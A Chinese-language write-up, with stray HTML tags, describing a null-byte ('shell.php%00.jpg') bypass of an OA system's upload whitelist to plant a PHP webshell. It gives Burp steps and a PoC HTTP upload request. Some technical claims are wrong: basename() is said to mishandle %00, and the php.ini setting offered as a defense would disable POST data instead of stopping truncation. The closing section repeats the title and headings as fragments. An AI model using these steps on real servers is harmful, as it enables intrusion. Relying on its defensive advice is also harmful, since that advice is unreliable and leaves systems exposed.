开源OA系统白名单后缀限制下的Getshell技术分析<\/h1>

漏洞背景<\/h2>
该漏洞存在于某开源OA系统中，系统对文件上传功能实施了白名单后缀限制，但通过巧妙利用系统设计缺陷，攻击者仍能实现getshell。<\/p>

漏洞原理<\/h2>

1. 白名单限制机制<\/h3>

系统采用以下方式验证上传文件：<\/p>

仅允许.jpg<\/code>, .png<\/code>, .gif<\/code>等图片后缀<\/li>
前端和后端均进行后缀校验<\/li>

文件内容不进行严格检测<\/li>
<\/ul>
2. 系统设计缺陷<\/h3>
系统存在以下关键设计问题：<\/p>

文件存储时保留了原始文件名<\/li>
文件处理逻辑中存在路径拼接操作<\/li>
文件处理服务对特殊字符处理不当<\/li>
<\/ul>
漏洞利用步骤<\/h2>
第一步：绕过前端验证<\/h3>

使用Burp Suite拦截文件上传请求<\/li>
修改filename<\/code>参数，添加特殊字符：
shell.php%00.jpg
<\/code><\/pre>
<\/li>
确保文件内容为有效的PHP代码<\/li>
<\/ol>
第二步：利用路径拼接缺陷<\/h3>

系统处理上传文件时使用以下逻辑：
$target_path =<\/span> UPLOAD_DIR<\/span> .<\/span> basename<\/span>($_FILES['file'<\/span>]['name'<\/span>]);
<\/span><\/span><\/code><\/pre><\/li>
由于PHP的basename()<\/code>函数处理%00<\/code>存在问题，导致：

系统认为文件名为shell.php<\/code><\/li>
但仍通过白名单校验(因为原始名为shell.php%00.jpg<\/code>)<\/li>
<\/ul>
<\/li>
<\/ol>
第三步：文件存储位置<\/h3>

上传的文件会被存储在：
\/uploads\/[日期]\/shell.php
<\/code><\/pre>
<\/li>
该目录通常具有执行权限<\/li>
<\/ol>
防御措施<\/h2>
1. 文件上传安全加固<\/h3>

实施严格的文件内容检测<\/li>
重命名上传文件，不使用原始文件名<\/li>
禁用危险字符处理：
if<\/span> (strpos<\/span>($filename, "<\/span>\0<\/span>"<\/span>) !==<\/span> false<\/span>) {
<\/span><\/span>    die<\/span>("Invalid filename"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. 服务器配置<\/h3>

设置上传目录不可执行<\/li>
配置PHP禁用%00<\/code>截断：
; php.ini<\/span>
<\/span><\/span>enable_post_data_reading<\/span> =<\/span> Off<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3. 代码审计要点<\/h3>
检查以下高危函数使用：<\/p>

basename()<\/code><\/li>
pathinfo()<\/code><\/li>
任何直接拼接用户输入作为文件路径的操作<\/li>
<\/ul>
漏洞验证<\/h2>
使用以下PoC验证漏洞存在：<\/p>
POST<\/span> \/upload.php HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundaryABC123<\/span>
<\/span><\/span>
<\/span><\/span>------WebKitFormBoundaryABC123
<\/span><\/span>Content-Disposition: form-data; name="file"; filename="shell.php%00.jpg"
<\/span><\/span>Content-Type: image\/jpeg
<\/span><\/span>
<\/span><\/span><?php phpinfo(); ?>
<\/span><\/span>------WebKitFormBoundaryABC123--
<\/span><\/span><\/code><\/pre>总结<\/h2>
该漏洞利用了两个关键点：<\/p>

PHP的%00<\/code>截断特性<\/li>
系统对上传文件名的处理逻辑缺陷<\/li>
<\/ol>
通过组合这些因素，攻击者可以绕过严格的白名单限制，实现任意文件上传getshell。防御此类漏洞需要从代码逻辑和服务器配置两方面进行加固。<\/p>

开源OA系统白名单后缀限制下的Getshell技术分析<\/h1>

漏洞背景<\/h2> 该漏洞存在于某开源OA系统中，系统对文件上传功能实施了白名单后缀限制，但通过巧妙利用系统设计缺陷，攻击者仍能实现getshell。<\/p>

漏洞原理<\/h2>

漏洞利用步骤<\/h2>

防御措施<\/h2>

漏洞背景<\/h2>
该漏洞存在于某开源OA系统中，系统对文件上传功能实施了白名单后缀限制，但通过巧妙利用系统设计缺陷，攻击者仍能实现getshell。<\/p>